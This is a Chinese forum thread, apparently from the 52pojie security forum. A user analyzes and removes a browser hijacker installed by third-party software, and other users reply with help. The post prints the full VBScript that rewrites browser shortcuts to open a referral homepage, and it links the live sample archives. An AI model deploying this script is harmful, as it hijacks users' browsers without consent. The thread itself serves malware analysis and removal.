吾爱破解 - 52pojie.cn

 找回密码
 注册[Register]

QQ登录

只需一步,快速开始

查看: 26281|回复: 21
收起左侧

[PC样本分析] 对一个浏览器劫持的解决,比较开心

[复制链接]
liuyuntianxia12 发表于 2017-1-12 09:35
使用论坛附件上传样本压缩包时必须使用压缩密码保护,压缩密码:52pojie,否则会导致论坛被杀毒软件等误报,论坛有权随时删除相关附件和帖子!
病毒分析分区附件样本、网址谨慎下载点击,可能对计算机产生破坏,仅供安全人员在法律允许范围内研究,禁止非法用途!
禁止求非法渗透测试、非法网络攻击、获取隐私等违法内容,即使对方是非法内容,也应向警方求助!
本帖最后由 liuyuntianxia12 于 2017-1-12 11:12 编辑

昨天手贱,用了这个(原因都懂...)http://www.52pojie.cn/thread-566605-1-1.html

知道会劫持浏览器(早先用过),但是又手贱啦,用火绒杀毒删除了查找到的vbs文件
重点来了,然后重启,电脑进入系统时就会关闭屏幕,然后风扇狂转不止

本人不是大神,只是个懂点基本电脑知识的小白,具体原因不明

强制重启后进入安全模式,还原最近记录点,然后一切OK

以下是参考网上多种教程在虚拟机尝试得到的内容:

程序运行会自动再windows目录添加这两个文件:
病毒1.png

修改快捷方式:
病毒2.png
IE相关快捷方式路径:
C:\Users\你的用户名\AppData\Roaming\Microsoft\Windows\Start Menu\Programs
C:\Users\你的用户名\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch


添加VBScript
扫描1.png



这是火绒扫描到的威胁

上面病毒的描述
描述1.png
被劫持的浏览器快捷方式(参照上面的路径自行修改)

扫描2.png

使用wmitool查看编辑VBScript
集体参考 http://www.52pojie.cn/thread-564599-1-1.html?winzoom=1

从这里查看脚本的内容
操作1.png
这就是火绒看到的威胁文件,删除即可

操作2.png

贴一下脚本内容:
[Visual Basic] 纯文本查看 复制代码
On Error Resume Next:Const link = "http://hao984.com/?r=xlgstdpjgjxx&m=v5":Const link360 = "http://hao984.com/?r=xlgstdpjgjxx&m=v5&s=3":browsers = "114ie.exe,115chrome.exe,1616browser.exe,2345chrome.exe,2345explorer.exe,360se.exe,360chrome.exe,avant.exe,baidubrowser.exe,chgreenbrowser.exe,chrome.exe,firefox.exe,greenbrowser.exe,iexplore.exe,juzi.exe,kbrowser.exe,launcher.exe,liebao.exe,maxthon.exe,niuniubrowser.exe,qqbrowser.exe,sogouexplorer.exe,srie.exe,tango3.exe,theworld.exe,tiantian.exe,twchrome.exe,ucbrowser.exe,webgamegt.exe,xbrowser.exe,xttbrowser.exe,yidian.exe,yyexplorer.exe":lnkpaths = "C:\Users\Public\Desktop,C:\ProgramData\Microsoft\Windows\Start Menu\Programs,C:\Users\WHFP\Desktop,C:\Users\WHFP\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch,C:\Users\WHFP\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu,C:\Users\WHFP\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar,C:\Users\WHFP\AppData\Roaming\Microsoft\Windows\Start Menu\Programs":browsersArr = split(browsers,","):Set oDic = CreateObject("scripting.dictionary"):For Each browser In browsersArr:oDic.Add LCase(browser), browser:Next:lnkpathsArr = split(lnkpaths,","):Set oFolders = CreateObject("scripting.dictionary"):For Each lnkpath In lnkpathsArr:oFolders.Add lnkpath, lnkpath:Next:Set fso = CreateObject("Scripting.Filesystemobject"):Set WshShell = CreateObject("Wscript.Shell"):For Each oFolder In oFolders:If fso.FolderExists(oFolder) Then:For Each file In fso.GetFolder(oFolder).Files:If LCase(fso.GetExtensionName(file.Path)) = "lnk" Then:Set oShellLink = WshShell.CreateShortcut(file.Path):path = oShellLink.TargetPath:name = fso.GetBaseName(path) & "." & fso.GetExtensionName(path):If oDic.Exists(LCase(name)) Then:If LCase(name) = LCase("360se.exe") Then:oShellLink.Arguments = link360:Else:oShellLink.Arguments = link:End If:If file.Attributes And 1 Then:file.Attributes = file.Attributes - 1:End If:oShellLink.Save:End If:End If:Next:End If:Next:


有没有大神解释下脚本...

这是流氓软件:
流氓软件(001).zip (1 MB, 下载次数: 81)
流氓软件(002).zip (990.37 KB, 下载次数: 75)



下载后
流氓软件(001).zip重命名为流氓软件.zip.001
流氓软件(002).zip重命名为流氓软件.zip.002

然后用解压软件打开001
请在虚拟机中尝试,产生的一切后果自己承担



免费评分

参与人数 3吾爱币 +12 热心值 +3 收起 理由
Hmily + 10 + 1 感谢发布原创作品,吾爱破解论坛因你更精彩!
愚无尽 + 1 + 1 不错好样的 我也在研究 火绒这东西
注册一下帐号 + 1 + 1 厉害

查看全部评分

发帖前要善用论坛搜索功能,那里可能会有你要找的答案或者已经有人发布过相同内容了,请勿重复发帖。

注册一下帐号 发表于 2017-1-12 11:28
本帖最后由 注册一下帐号 于 2017-1-12 11:44 编辑

你这个现象应该是这个东西只是改了浏览器。。
黑屏和驱动那个你是不是使用小马激活了?
上传一下这个吧
-------------------------------------------
还有C:\Users\用户名\AppData\Local\Microsoft\Windows\Explorer\
下面是不是有dll文件,传一下
tydzjing 发表于 2017-3-2 21:04
liuyuntianxia12 发表于 2017-3-2 17:09
实在不行就参考这个帖子http://www.52pojie.cn/thread-578669-1-1.html
用这个软件试一下,注意选择选项

多谢,已经解决了,刚开始以为把脚本内容清空就可以了,结果还是会修改。现在把脚本彻底删掉,没再提示过被修改。
愚无尽 发表于 2017-1-12 09:46
 楼主| liuyuntianxia12 发表于 2017-1-12 10:02
愚无尽 发表于 2017-1-12 09:46
根据描述 环境过程无法清晰 现场无法还原

正在虚拟机中尝试还原,基本找到了问题,待会贴下截图
zhangbaoyu 发表于 2017-1-12 10:16
厉害呀,怎么回事啊啊????
落魄狂人 发表于 2017-1-12 10:26
等待结果 看看是什么东西
注册一下帐号 发表于 2017-1-12 10:33
样本下载不到了,楼主能上传一下吗
 楼主| liuyuntianxia12 发表于 2017-1-12 11:05
注册一下帐号 发表于 2017-1-12 10:33
样本下载不到了,楼主能上传一下吗

帖子已更新附件
leahdizon 发表于 2017-1-12 11:10
很是困扰浏览器被劫持,特别是还串改了我的首页
 楼主| liuyuntianxia12 发表于 2017-1-12 11:12
leahdizon 发表于 2017-1-12 11:10
很是困扰浏览器被劫持,特别是还串改了我的首页

参考上面改,基本就没问题了
您需要登录后才可以回帖 登录 | 注册[Register]

本版积分规则

返回列表

RSS订阅|小黑屋|处罚记录|联系我们|吾爱破解 - LCG - LSG ( 京ICP备16042023号 | 京公网安备 11010502030087号 )

GMT+8, 2024-11-24 10:23

Powered by Discuz!

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表